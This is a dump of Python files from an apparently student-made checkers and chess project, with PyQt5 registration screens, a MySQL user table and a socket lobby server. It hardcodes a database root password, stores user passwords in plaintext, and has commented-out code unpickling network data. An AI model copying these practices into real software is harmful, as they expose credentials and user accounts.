self.FirstName.setObjectName(\"FirstName\")\n self.BirthYear = QtWidgets.QLineEdit(self.centralwidget)\n self.BirthYear.setGeometry(QtCore.QRect(70, 150, 200, 40))\n self.BirthYear.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.BirthYear.setObjectName(\"BirthYear\")\n self.Username = QtWidgets.QLineEdit(self.centralwidget)\n self.Username.setGeometry(QtCore.QRect(70, 220, 200, 40))\n self.Username.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.Username.setObjectName(\"Username\")\n self.LastName = QtWidgets.QLineEdit(self.centralwidget)\n self.LastName.setGeometry(QtCore.QRect(340, 80, 200, 40))\n self.LastName.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.LastName.setObjectName(\"LastName\")\n self.EmailAdress = QtWidgets.QLineEdit(self.centralwidget)\n self.EmailAdress.setGeometry(QtCore.QRect(340, 150, 200, 40))\n self.EmailAdress.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.EmailAdress.setObjectName(\"EmailAdress\")\n self.Password = QtWidgets.QLineEdit(self.centralwidget)\n self.Password.setGeometry(QtCore.QRect(340, 220, 200, 40))\n self.Password.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n self.Password.setObjectName(\"Password\")\n self.Register = QtWidgets.QPushButton(self.centralwidget)\n self.Register.setGeometry(QtCore.QRect(200, 280, 200, 35))\n self.Register.setStyleSheet(\"background-color:red;\\n\"\n \"color:white;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\\n\"\n \"border-color:black;\\n\"\n \"\")\n self.Register.setObjectName(\"Register\")\n self.Back = QtWidgets.QPushButton(self.centralwidget)\n self.Back.setGeometry(QtCore.QRect(200, 330, 200, 35))\n self.Back.setStyleSheet(\"background-color:red;\\n\"\n \"color:white;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\\n\"\n \"border-color:black;\\n\"\n \"\")\n self.Back.setObjectName(\"Back\")\n Registration.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(Registration)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n self.menubar.setObjectName(\"menubar\")\n Registration.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(Registration)\n self.statusbar.setObjectName(\"statusbar\")\n Registration.setStatusBar(self.statusbar)\n self.retranslateUi(Registration)\n self.Back.clicked.connect(lambda x: self.openWindow())\n QtCore.QMetaObject.connectSlotsByName(Registration)\n self.Register.clicked.connect(lambda x: self.RegistrationToDB())\n\n def RegistrationToDB(self):\n exist = False\n firstName = self.FirstName.text()\n lastName = self.LastName.text()\n birthYear = self.BirthYear.text()\n email = self.EmailAdress.text()\n username = self.Username.text()\n password = self.Password.text()\n try:\n birthYear = int(birthYear)\n except:\n self.InvalidBirthYearPopUp()\n exist = True\n if not exist:\n mycursor.execute(\"SELECT username, password, first_name, last_name, birth_year, email FROM Users\")\n for (exist_user, exist_passw, exist_first_name, exist_last_name, exist_birth_year, exist_email) in mycursor:\n if exist_user == username:\n self.UsernameExistPopUp()\n exist = True\n elif exist_email == email:\n self.EmailExistPopUp()\n exist = True\n elif exist_first_name == \"\" or exist_user == \"\" or exist_passw == \"\" or exist_last_name == \"\" or exist_email == \"\":\n exist = True\n if not exist:\n mycursor.execute(\"INSERT INTO Users (username, password, first_name, last_name, birth_year, email) VALUES (%s,%s,%s,%s,%s,%s)\", (username, password, firstName, lastName, birthYear, email))\n db.commit()\n self.openWindow()\n\n def UsernameExistPopUp(self):\n msg = QMessageBox()\n msg.setWindowTitle(\"Username Exists\")\n msg.setText(\"This username is already exists.\")\n\n x = msg.exec_()\n\n def EmailExistPopUp(self):\n msg = QMessageBox()\n msg.setWindowTitle(\"Email Exists\")\n msg.setText(\"This email address is already exists.\")\n\n x = msg.exec_()\n\n def InvalidBirthYearPopUp(self):\n msg = QMessageBox()\n msg.setWindowTitle(\"Invalid Birth Year\")\n msg.setText(\"The birth year is not valid.\")\n\n x = msg.exec_()\n\n def retranslateUi(self, Registration):\n _translate = QtCore.QCoreApplication.translate\n Registration.setWindowTitle(_translate(\"Registration\", \"Registration Page\"))\n self.RegisterLabel.setText(_translate(\"Registration\", \"Register\"))\n self.FirstName.setPlaceholderText(_translate(\"Registration\", \"Enter your First Name\"))\n self.BirthYear.setPlaceholderText(_translate(\"Registration\", \"Enter your Birth Year\"))\n self.Username.setPlaceholderText(_translate(\"Registration\", \"Enter Username\"))\n self.LastName.setPlaceholderText(_translate(\"Registration\", \"Enter your Last Name\"))\n self.EmailAdress.setPlaceholderText(_translate(\"Registration\", \"Enter your Email Adress\"))\n self.Password.setPlaceholderText(_translate(\"Registration\", \"Enter Password\"))\n self.Back.setText(_translate(\"Registration\", \"Back\"))\n self.Register.setText(_translate(\"Registration\", \"Register\"))\n\nclass Ui_ChessOptions(object):\n def setupUi(self, ChessOptions):\n ChessOptions.setObjectName(\"ChessOptions\")\n ChessOptions.resize(600, 400)\n ChessOptions.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(ChessOptions)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.MainLabel = QtWidgets.QLabel(self.centralwidget)\n self.MainLabel.setGeometry(QtCore.QRect(207, 30, 185, 71))\n self.MainLabel.setStyleSheet(\"color:white;\\n\"\n\"font:bold 25px;\\n\"\n\"\")\n self.MainLabel.setObjectName(\"MainLabel\")\n self.PlayVSComputer = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSComputer.setGeometry(QtCore.QRect(100, 120, 300, 50))\n self.PlayVSComputer.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSComputer.setObjectName(\"PlayVSComputer\")\n self.PlayVSFriend = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSFriend.setGeometry(QtCore.QRect(100, 190, 300, 50))\n self.PlayVSFriend.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSFriend.setObjectName(\"PlayVSFriend\")\n self.PlayVSYourself = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSYourself.setGeometry(QtCore.QRect(100, 260, 300, 50))\n self.PlayVSYourself.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSYourself.setObjectName(\"PlayVSYourself\")\n ChessOptions.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(ChessOptions)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n self.menubar.setObjectName(\"menubar\")\n ChessOptions.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(ChessOptions)\n self.statusbar.setObjectName(\"statusbar\")\n ChessOptions.setStatusBar(self.statusbar)\n self.retranslateUi(ChessOptions)\n QtCore.QMetaObject.connectSlotsByName(ChessOptions)\n \n\n def retranslateUi(self, ChessOptions):\n _translate = QtCore.QCoreApplication.translate\n ChessOptions.setWindowTitle(_translate(\"ChessOptions\", \"Chess Options\"))\n self.MainLabel.setText(_translate(\"ChessOptions\", \"Chess Options\"))\n self.PlayVSComputer.setText(_translate(\"ChessOptions\", \"Play VS. computer\"))\n self.PlayVSFriend.setText(_translate(\"ChessOptions\", \"Play VS. a friend\"))\n self.PlayVSYourself.setText(_translate(\"ChessOptions\", \"Play VS. yourself\"))\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n mycursor.execute(\"SELECT * FROM Users\")\n for x in mycursor:\n print(x)\n MainWindow.show()\n sys.exit(app.exec_())\n"
},
{
"alpha_fraction": 0.5681159496307373,
"alphanum_fraction": 0.5920289754867554,
"avg_line_length": 21.62295150756836,
"blob_id": "7c8f85372821b83faea496c15ce176d030d9efb0",
"content_id": "db6cd9543c04fe5832f49a4374b3c1ff1c1a21ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1380,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 61,
"path": "/server.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import socket\nfrom _thread import *\nfrom lobby import Lobby\nimport pickle\nimport time\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nserver = \"localhost\"\nport = 5555\n\nserver_ip = socket.gethostbyname(server)\n\nconnections = 0\n\ngames = {}\n\n\ndef main():\n try:\n sock.bind((server, port))\n\n except socket.error as e:\n print(str(e))\n\n sock.listen()\n print(\"[START] Waiting for a connection\")\n\n while True:\n client, addr = sock.accept()\n print(\"[CONNECT] New Connection\")\n\n lobbyId = int(client.recv(1024).decode())\n if lobbyId == -1:\n lobbyId = id_generator()\n games[lobbyId] = Lobby(client, lobbyId)\n client.send(b\"Creating New Lobby \" + str(lobbyId).encode())\n print(\"Created New Lobby\")\n games[lobbyId].start()\n\n elif lobbyId in games.keys():\n if not len(games[lobbyId].clients) == 2:\n games[lobbyId].clients.append(client)\n client.send(b\"Joining Into an Existing Lobby\")\n\n else:\n client.send(b\"[ERROR] 743: lobby is full\")\n\n else:\n client.send(b\"[ERROR] 404: lobby not found\")\n\n\ndef id_generator():\n import random\n lobbyId = random.randint(1000, 9999)\n while lobbyId in games.keys():\n lobbyId = random.randint(1000, 9999)\n\n return lobbyId\n\nmain()\n"
},
{
"alpha_fraction": 0.5283893346786499,
"alphanum_fraction": 0.5451911687850952,
"avg_line_length": 30.981481552124023,
"blob_id": "f5fee2342ccede89eaa4ddc0e908944cfdb32938",
"content_id": "4d31653050319613d5fa08b3826e8f41a4a92798",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1726,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 54,
"path": "/lobby.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import pygame as pg\nimport threading\nimport board\nimport pickle\n\n\nclass Lobby(threading.Thread):\n def __init__(self, client, lobbyId):\n threading.Thread.__init__(self)\n self.lobbyId = lobbyId\n self.clients = [client]\n\n def run(self):\n while len(self.clients) < 2:\n pass\n\n for i in range(len(self.clients)):\n self.clients[i].send(b\"Starting Game...\")\n color = \"w\" if i == 0 else \"b\"\n self.clients[i].send(b\"You are:\" + color.encode())\n\n self.play()\n\n def play(self):\n while True:\n board = self.clients[0].recv(1024 * 32)\n self.clients[1].send(board)\n board = self.clients[1].recv(1024 * 32)\n self.clients[0].send(board)\n\n \"\"\"\n currentId = 0\n sendBoard = pickle.dumps(self.board)\n for client in self.clients:\n client.send(sendBoard)\n\n while not self.board.winner:\n color = \"white\" if currentId == 0 else \"black\"\n for client in self.clients:\n print(\"This is \" + color + \" turn\")\n client.send((\"This is \" + color + \" turn\").encode())\n\n sendBoard = pickle.dumps(self.board)\n self.clients[currentId].send(sendBoard)\n print(\"Sending Board to \" + color + \"in lobby \" + str(self.lobbyId))\n\n newBoard = self.clients[currentId].recv(1024 * 32)\n self.board = pickle.loads(newBoard)\n print(\"Received Board From \" + color + \" in lobby \" + str(self.lobbyId))\n currentId = 1 if currentId == 0 else 0\n\n for client in self.clients:\n client.send((self.board.winner + \" is the Winner\").encode())\n \"\"\""
},
{
"alpha_fraction": 0.6481038331985474,
"alphanum_fraction": 0.682439386844635,
"avg_line_length": 37.768211364746094,
"blob_id": "4d617c50cb98d58fe4890f0620bea6e9042ccdfd",
"content_id": "68f9c568ad970f160742e1d9c6652a1ba09b0d95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5854,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 151,
"path": "/UI/Register.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'Register.ui'\n#\n# Created by: PyQt5 UI code generator 5.13.2\n#\n# WARNING! All changes made in this file will be lost!\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_RegisterWindow(object):\n\n def openWindow(self):\n\n self.window = QtWidgets.QMainWindow()\n self.ui = Register.Ui_RegisterWindow()\n self.ui.setupUi(self.window)\n self.window.show()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(600, 400)\n MainWindow.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(215, 10, 170, 50))\n self.label.setStyleSheet(\"color:white;\\n\"\n\"font:bold 35px;\\n\"\n\"\")\n self.label.setObjectName(\"label\")\n self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit.setGeometry(QtCore.QRect(70, 80, 200, 40))\n self.lineEdit.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit.setObjectName(\"lineEdit\")\n self.lineEdit_2 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_2.setGeometry(QtCore.QRect(70, 150, 200, 40))\n self.lineEdit_2.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_2.setObjectName(\"lineEdit_2\")\n self.lineEdit_3 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_3.setGeometry(QtCore.QRect(70, 220, 200, 40))\n self.lineEdit_3.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_3.setObjectName(\"lineEdit_3\")\n self.lineEdit_4 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_4.setGeometry(QtCore.QRect(340, 80, 200, 40))\n self.lineEdit_4.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_4.setObjectName(\"lineEdit_4\")\n self.lineEdit_5 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_5.setGeometry(QtCore.QRect(340, 150, 200, 40))\n self.lineEdit_5.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_5.setObjectName(\"lineEdit_5\")\n self.lineEdit_6 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_6.setGeometry(QtCore.QRect(340, 220, 200, 40))\n self.lineEdit_6.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_6.setObjectName(\"lineEdit_6\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(200, 280, 200, 35))\n self.label_2.setStyleSheet(\"background-color:red;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\\n\"\n\"\")\n self.label_2.setObjectName(\"label_2\")\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\n self.label_3.setGeometry(QtCore.QRect(200, 330, 200, 35))\n self.label_3.setStyleSheet(\"background-color:red;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\\n\"\n\"\")\n self.label_3.setObjectName(\"label_3\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.label.setText(_translate(\"MainWindow\", \"Register\"))\n self.lineEdit.setText(_translate(\"MainWindow\", \"Enter your First Name\"))\n self.lineEdit_2.setText(_translate(\"MainWindow\", \"Enter your Birth Year\"))\n self.lineEdit_3.setText(_translate(\"MainWindow\", \"Enter Username\"))\n self.lineEdit_4.setText(_translate(\"MainWindow\", \"Enter your Last Name\"))\n self.lineEdit_5.setText(_translate(\"MainWindow\", \"Enter your Email Adress\"))\n self.lineEdit_6.setText(_translate(\"MainWindow\", \"Enter Password\"))\n self.label_2.setText(_translate(\"MainWindow\", \"<html><head/><body><p align=\\\"center\\\"><span style=\\\" font-size:11pt;\\\">Register</span></p></body></html>\"))\n self.label_3.setText(_translate(\"MainWindow\", \"<html><head/><body><p align=\\\"center\\\"><span style=\\\" font-size:11pt;\\\">Back</span></p></body></html>\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_RegisterWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n"
},
{
"alpha_fraction": 0.5664243102073669,
"alphanum_fraction": 0.5763384103775024,
"avg_line_length": 31.191490173339844,
"blob_id": "fd8835ae17fae5e02f4c2a1913e856f0a66e4341",
"content_id": "609f3962f61caee6fa9c77f6d7d254de4271f09d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1513,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 47,
"path": "/piece.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import pygame as pg\nfrom info import black, white, radius, sqr_width, sqr_height, adjust_location, clicked, rows\n\n\nclass Piece():\n def __init__(self, location, isBlack):\n self.black = isBlack\n self.white = not isBlack\n self.queen = False\n self.possibleLocations = []\n self.row = location[0]\n self.col = location[1]\n self.position = adjust_location(location)\n\n def draw(self, win):\n if self.black:\n if not self.queen:\n pg.draw.circle(win, black, self.position, radius)\n else:\n pg.draw.circle(win, black, self.position, radius, 10)\n\n elif self.white:\n if not self.queen:\n pg.draw.circle(win, white, self.position, radius)\n else:\n pg.draw.circle(win, white, self.position, radius, 10)\n\n def change_pos(self, location):\n self.row = location[0]\n self.col = location[1]\n self.position = adjust_location(location)\n\n def __str__(self):\n return str(self.col) + \" \" + str(self.row)\n\n def highlight_possible_location(self, win):\n for possibleLocation in self.possibleLocations:\n pos = adjust_location(possibleLocation)\n pg.draw.circle(win, (2, 28, 30), pos, radius)\n pg.display.update()\n\n def checks_if_become_queen(self):\n if self.white and self.row == 0:\n self.queen = True\n\n elif self.black and self.row == rows - 1:\n self.queen = True\n"
},
{
"alpha_fraction": 0.6834468245506287,
"alphanum_fraction": 0.7071365118026733,
"avg_line_length": 37.81609344482422,
"blob_id": "92cd54908b918451fede61995e3b8579b29a980b",
"content_id": "f929dc447a526bc4a008a0914e715b53dc17bb4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3377,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 87,
"path": "/UI/ChessOptions.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'ChessOptions.ui'\n#\n# Created by: PyQt5 UI code generator 5.13.2\n#\n# WARNING! All changes made in this file will be lost!\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_ChessOptions(object):\n def setupUi(self, ChessOptions):\n ChessOptions.setObjectName(\"ChessOptions\")\n ChessOptions.resize(600, 400)\n ChessOptions.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(ChessOptions)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.MainLabel = QtWidgets.QLabel(self.centralwidget)\n self.MainLabel.setGeometry(QtCore.QRect(207, 30, 185, 71))\n self.MainLabel.setStyleSheet(\"color:white;\\n\"\n\"font:bold 25px;\\n\"\n\"\")\n self.MainLabel.setObjectName(\"MainLabel\")\n self.PlayVSComputer = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSComputer.setGeometry(QtCore.QRect(100, 120, 300, 50))\n self.PlayVSComputer.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSComputer.setObjectName(\"PlayVSComputer\")\n self.PlayVSFriend = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSFriend.setGeometry(QtCore.QRect(100, 190, 300, 50))\n self.PlayVSFriend.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSFriend.setObjectName(\"PlayVSFriend\")\n self.PlayVSYourself = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSYourself.setGeometry(QtCore.QRect(100, 260, 300, 50))\n self.PlayVSYourself.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSYourself.setObjectName(\"PlayVSYourself\")\n ChessOptions.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(ChessOptions)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n self.menubar.setObjectName(\"menubar\")\n ChessOptions.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(ChessOptions)\n self.statusbar.setObjectName(\"statusbar\")\n ChessOptions.setStatusBar(self.statusbar)\n\n self.retranslateUi(ChessOptions)\n QtCore.QMetaObject.connectSlotsByName(ChessOptions)\n\n def retranslateUi(self, ChessOptions):\n _translate = QtCore.QCoreApplication.translate\n ChessOptions.setWindowTitle(_translate(\"ChessOptions\", \"Chess Options\"))\n self.MainLabel.setText(_translate(\"ChessOptions\", \"Chess Options\"))\n self.PlayVSComputer.setText(_translate(\"ChessOptions\", \"Play VS. computer\"))\n self.PlayVSFriend.setText(_translate(\"ChessOptions\", \"Play VS. a friend\"))\n self.PlayVSYourself.setText(_translate(\"ChessOptions\", \"Play VS. yourself\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n ChessOptions = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(ChessOptions)\n ChessOptions.show()\n sys.exit(app.exec_())\n"
},
{
"alpha_fraction": 0.5373051166534424,
"alphanum_fraction": 0.5417594909667969,
"avg_line_length": 27.967741012573242,
"blob_id": "6c18840586c7a2fd80e4fc50a2e2ad89a96ddc7d",
"content_id": "1e306f163a9a0df9d3c1d9e781d73f59793372a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1796,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 62,
"path": "/checkers.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import pygame as pg\nfrom board import Board\nfrom info import boardWidth, boardHeight, clicked\n\nboard = Board()\n\n\ndef ValidClicked(mousePos, currentPlayer):\n for rowPieces in board.board:\n for piece in rowPieces:\n if piece != 0:\n if currentPlayer == 1 and piece.white:\n if clicked(piece.position, mousePos):\n return piece\n elif currentPlayer == -1 and piece.black:\n if clicked(piece.position, mousePos):\n return piece\n return False\n\n\ndef RedrawGameWindow(board, win):\n board.draw(win)\n for rowPieces in board.board:\n for piece in rowPieces:\n if piece != 0:\n piece.draw(win)\n pg.display.update()\n\n# Main Loop\ndef main():\n # Initiate Windows\n win = pg.display.set_mode((boardWidth, boardHeight))\n pg.display.set_caption(\"Checkers\")\n\n run = True\n clock = pg.time.Clock()\n currentPlayer = 1\n RedrawGameWindow(board, win)\n\n while run:\n clock.tick(27)\n\n keys = pg.key.get_pressed()\n for event in pg.event.get():\n if event.type == pg.QUIT or keys[pg.K_ESCAPE]:\n run = False\n\n if event.type == pg.MOUSEBUTTONDOWN:\n mousePos = pg.mouse.get_pos()\n clickedPiece = ValidClicked(mousePos, currentPlayer)\n while clickedPiece:\n board.update_moves(clickedPiece)\n clickedPiece = board.move(clickedPiece, win)\n if clickedPiece == \"moved\":\n currentPlayer *= -1\n clickedPiece = None\n\n RedrawGameWindow(board, win)\n\nif __name__ == '__main__':\n if __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7066666483879089,
"alphanum_fraction": 0.7180952429771423,
"avg_line_length": 33.93333435058594,
"blob_id": "0b988cf44ca54cae7765c0e5a86615afae28ff48",
"content_id": "880abe89e5db0d9599b98dc500a69752dcbfd7b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 15,
"path": "/UI/SQL.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import mysql.connector\nfrom datetime import datetime\n\ndb = mysql.connector.connect(\n host='localhost',\n user='root',\n passwd='wamit112233',\n database='testdatabase'\n )\n\nmycursor = db.cursor()\n\n#mycursor.execute('CREATE TABLE Test (name VARCHAR(50) NOT NULL, created datetime NOT NULL, gender ENUM(\"M\", \"F\", \"O\") NOT NULL, id int PRIMARY KEY NOT NULL AUTO_INCREMENT)')\n#mycursor.execute(\"CREATE TABLE Users (username VARCHAR(50) NOT NULL, password VARCHAR(50) NOT NULL)\")\nmycursor.execute(\"DELETE TABLE Users\")\n\n"
},
{
"alpha_fraction": 0.586413562297821,
"alphanum_fraction": 0.6503496766090393,
"avg_line_length": 24.024999618530273,
"blob_id": "9f0a77db4ac88ce1fb83baeea191fa08064d8a1b",
"content_id": "68d52356038d3d440e1cdded283aecff87c64b5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1001,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 40,
"path": "/info.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
